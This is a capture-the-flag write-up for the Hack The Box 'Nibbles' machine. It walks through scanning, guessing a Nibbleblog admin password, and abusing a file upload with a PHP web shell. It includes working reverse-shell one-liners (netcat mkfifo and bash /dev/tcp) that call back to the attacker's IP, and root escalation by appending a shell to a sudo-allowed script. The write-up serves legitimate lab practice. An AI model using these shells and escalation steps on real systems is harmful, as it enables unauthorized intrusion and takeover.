Netkubb
HomeAboutContact
[HTB] Nibbles - Writeup

[HTB] Nibbles - Writeup

Tags
HTB
Published
December 28, 2023
Author
Netkubb

Overview

  1. Gathering box information
  1. Gathering website information and vulnerability
  1. Start Hijacking
  1. Privilege escalation
  1. Pwn!!
 
let's start!!
IP: 10.129.88.213

Gathering box information

run nmap version scan on default port nmap -sV --open -oA nibbles_initial_scan 10.129.88.213
-sV is version scan
—open is show only open port
-oA [filename] is to save result in [filename]
and here is the result
# Nmap 7.94 scan initiated Fri Sep  8 15:28:38 2023 as: nmap -sV --open -oA nibbles_initial_scan 10.129.88.213
Nmap scan report for 10.129.88.213
Host is up (0.19s latency).
Not shown: 945 closed tcp ports (conn-refused), 53 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep  8 15:28:57 2023 -- 1 IP address (1 host up) scanned in 18.92 seconds
so we know that port 22 and 80 is open now we do the script scan for 22 and 80
nmap -sC -p 22,80 -oA nibbles_script_scan 10.129.42.190
-sC is script scan
-p [port,] to specify port
and here is the result
# Nmap 7.94 scan initiated Fri Sep  8 15:30:02 2023 as: nmap -sC --open -oA nibbles_script_scan 10.129.88.213
Nmap scan report for 10.129.88.213
Host is up (0.19s latency).
Not shown: 974 closed tcp ports (conn-refused), 24 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http
|_http-title: Site doesn't have a title (text/html).

# Nmap done at Fri Sep  8 15:30:21 2023 -- 1 IP address (1 host up) scanned in 18.92 seconds
it looks like nothing special here but since we know that port 80 is for http so we should now move on to the next step

Gathering website information and vulnerability

gobuster dir -u http://10.129.88.213/ --wordlist /usr/share/dirb/wordlists/common.txt
Next, use whatweb to gather website information
$ whatweb http://10.129.119.17/
http://10.129.119.17/ [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.119.17]
Use Firefox to browse at [IP]:80 we get
notion image
once again nothing special but when we view page source we get
notion image
Once again let's use gobuster before doing anything since it takes forever to do the scan from South East Asia
gobuster dir -u http://10.129.88.213/nibbleblog/ --wordlist /usr/share/dirb/wordlists/common.txt
we find something interesting so we go to [IP]/nibbleblog and use whatweb to gather more information here is what we got
$ whatweb http://10.129.119.17/nibbleblog
http://10.129.119.17/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.119.17], RedirectLocation[http://10.129.119.17/nibbleblog/], Title[301 Moved Permanently]
http://10.129.119.17/nibbleblog/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.119.17], JQuery, MetaGenerator[Nibbleblog], PoweredBy[Nibbleblog], Script, Title[Nibbles - Yum yum]
notion image
Now we know that it use Nibbleblog as CMS and we do the quick google search on Nibbleblog exploit and result
notion image
so we know that it is vulnerable on version 4.0.3 however we don't know Nibbleblog version yet
while we don't know what to do next gobuster result something interesting for us
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.21.151/nibbleblog
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 308]
/.hta                 (Status: 403) [Size: 303]
/.htaccess            (Status: 403) [Size: 308]
/admin                (Status: 301) [Size: 325] [--> http://10.129.21.151/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/content              (Status: 301) [Size: 327] [--> http://10.129.21.151/nibbleblog/content/]
/index.php            (Status: 200) [Size: 2987]
/languages            (Status: 301) [Size: 329] [--> http://10.129.21.151/nibbleblog/languages/]
/plugins              (Status: 301) [Size: 327] [--> http://10.129.21.151/nibbleblog/plugins/]
/README               (Status: 200) [Size: 4628]
/themes               (Status: 301) [Size: 326] [--> http://10.129.21.151/nibbleblog/themes/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
now we have admin.php, /content, /languages, /plugins, README, /themes to check out
when we navigate to admin.php we found login page
notion image
somehow look like we need to crack this but let's set this aside and dig into something else
README give us information about version of nibbleblog and it's actually 4.0.3 which has Arbitrary File Upload
while we digging into /content, /languages, /plugins, README, /themes we found that /content has thing like /private/user.xml so we should check that out
notion image
it's look like we found that username is actually admin but we also found that it's brute force protected(since they counting fail_count)
after check /content/private/config.xml we notice that they use nibbles many times so we try to use nibbles as password and luckily we cracked it
you might think how are we going to figure this out but we have 2 clues
  1. it's prevent us from brute force so the password should not be too hard
  1. “When performing password cracking offline with a tool such as Hashcat or attempting to guess a password, it is important to consider all of the information in front of us. It is not uncommon to successfully crack a password hash (such as a company's wireless network passphrase) using a wordlist generated by crawling their website using a tool such as CeWL. “ said Hack The Box
now we login as admin

Start Hijacking

notion image
notion image
when we play around this site we found My image plugin catch our attention and it can upload some file
So we try to create PHP file since this is running on Apache and upload it let's name it shell.php
<?php system('id'); ?>
try to upload in My image plugin
notion image
get a bunch of errors but still look like it's working so we check that out on /content/private/plugins/my_image/image.php and it's running our script
notion image
so now we are going to run reverse shell to get access to the machine
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.102 1234 >/tmp/f'); ?>
and listening on our machine
nc -lvnp 1234
now we get access to the machine as nibbler
Upgrade TTY using python -c 'import pty; pty.spawn("/bin/bash")' but since python is not found we try which python3 and use python3 -c 'import pty; pty.spawn("/bin/bash")' instead
next we navigate to Home directory(~) and cat user.txt
notion image

Privilege escalation

before we doing anything we unzip personal.zip and find that monitor.sh is interesting so we cat that out and get
                 ####################################################################################################

                 #                                        Tecmint_monitor.sh                                        #

                 # Written for Tecmint.com for the post www.tecmint.com/linux-server-health-monitoring-script/      #

                 # If any bug, report us in the link below                                                          #

                 # Free to use/edit/distribute the code below by                                                    #

                 # giving proper credit to Tecmint.com and Author                                                   #

                 #                                                                                                  #

                 ####################################################################################################

#! /bin/bash

# unset any variable which system may be using

# clear the screen

clear

unset tecreset os architecture kernelrelease internalip externalip nameserver loadaverage

while getopts iv name
do
       case $name in
         i)iopt=1;;
         v)vopt=1;;
         *)echo "Invalid arg";;
       esac
done

 <SNIP>
nothing special here
what is the best start for privilege escalation…linEnum.sh since HTB instance cannot connect to external network we need to download linEnum.sh from our computer
first we download linEnum.sh to our machine and host that directory using python -m http.server 8080 then we download from HTB instance using wget http://[my_ip]:8080/linenum.sh then we chmod +x linenum.sh and run ./linenum.sh what first catch our interest is
[+] We can sudo without supplying a password!
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh


[+] Possible sudo pwnage!
/home/nibbler/personal/stuff/monitor.sh
another way to find command that can sudo without password is su -l and [GTFOBins] to crack most cases however this one is special case (monitor.sh is tools that created just for this box) but we found that monitor.sh own by nibbler and still can run sudo without password mean we can edit anything inside and run as sudo so we echo "bash -i >& /dev/tcp/10.10.15.102/1235 0>&1" | tee -a monitor.sh
tee -a [file] is a command to append file without edit anything else
and run sudo ./monitor.sh while listening in our machine nc -lvnp 1235 and we cracked it
$ nc -lvnp 1235
listening on [any] 1235 ...

connect to [10.10.15.102] from (UNKNOWN) [10.129.200.170] 46500

# python3 -c 'import pty; pty.spawn("/bin/bash")'
root@Nibbles:/home/nibbler/personal/stuff# cd ~
root@Nibbles:~# ls
ls
root.txt
root@Nibbles:~# cat root.txt
cat root.txt
de5e5d6619862a8aa5b9b212314e0cdd
 

Conclusion

  1. we start with nmap scan
  1. we scan website and found that Nibbleblog has been used in this site
  1. Nibbleblog is vulnerable on version 4.0.3
  1. we cracked password
  1. upload PHP script and gain user privilege
  1. we exploit personal.zip and gain root privilege
🥳 WE DID IT !!!

My mistake

  1. we should use nmap script scan only on open port
  1. is something we should check on
  1. when we talking about web gobuster is what we should do first
  1. some script such as bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 might not work in some situation for example this machine
  1. su -l is one of common key that lead to exploit
  1. when we have edit sudo-able file we must not change the content inside but append instead
 
Copyright 2025 Waranont Chaosanguan